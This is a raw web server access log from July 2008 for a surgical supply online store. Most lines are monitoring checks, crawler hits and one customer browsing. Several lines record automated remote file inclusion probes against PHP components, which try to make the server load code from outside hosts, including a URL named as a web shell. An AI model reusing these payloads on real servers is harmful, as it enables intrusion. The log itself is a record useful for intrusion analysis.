209.59.12.99 - - [20/Jul/2008:00:04:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:00:09:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.110.54.240 - - [20/Jul/2008:00:11:22 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:11:22 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:11:22 -0400] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:11:22 -0400] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
209.172.57.77 - - [20/Jul/2008:00:13:07 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.172.57.77 - - [20/Jul/2008:00:13:07 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
209.172.57.77 - - [20/Jul/2008:00:13:07 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jul/2008:00:14:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.73.25 - - [20/Jul/2008:00:17:51 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.73.25 - - [20/Jul/2008:00:17:51 -0400] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
209.59.12.99 - - [20/Jul/2008:00:19:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.110.54.240 - - [20/Jul/2008:00:23:44 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:23:44 -0400] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:23:51 -0400] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:23:51 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 283 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/Jul/2008:00:24:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.172.57.77 - - [20/Jul/2008:00:25:46 -0400] "GET /logs/error_log.Q108040800//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
209.172.57.77 - - [20/Jul/2008:00:25:46 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
209.172.57.77 - - [20/Jul/2008:00:25:46 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
209.59.12.99 - - [20/Jul/2008:00:29:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [20/Jul/2008:00:34:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.110.54.240 - - [20/Jul/2008:00:36:26 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:36:26 -0400] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:36:37 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
217.110.54.240 - - [20/Jul/2008:00:36:37 -0400] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.jpcss.com/cgi/phpconv/Bookmarks/osi.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:49 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:36:52 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:14 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:14 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:15 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:15 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:16 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:16 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:21 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
85.17.3.212 - - [20/Jul/2008:00:37:21 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
118.166.232.67 - - [20/Jul/2008:00:38:46 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:38:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:39:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:39:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.59.12.99 - - [20/Jul/2008:00:39:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.166.232.67 - - [20/Jul/2008:00:40:07 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS%20(S0040):0 HTTP/1.1" 200 49929 "http://www.acesurgical.com/caso4.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:13 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:16 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:18 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:22 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:23 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:24 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:25 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:26 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:27 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:29 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:30 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:31 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:32 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:32 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:34 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:34 -0400] "GET /images/items/CALCIUMSULFATE_THUMB.JPG HTTP/1.1" 200 2715 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:36 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:38 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:38 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:39 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:40 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:41 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:42 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:43 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:45 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:47 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:40:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:41:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG HTTP/1.1" 200 75533 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:41:37 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:41:38 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:41:39 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:41:43 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:41:58 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L7F16892817622300ED8505Z+M37+ENG HTTP/1.1" 200 65182 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:16 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L7F1689201F32E300A70505Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:22 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
118.166.232.67 - - [20/Jul/2008:00:42:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Foxy/1; Foxy/1; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
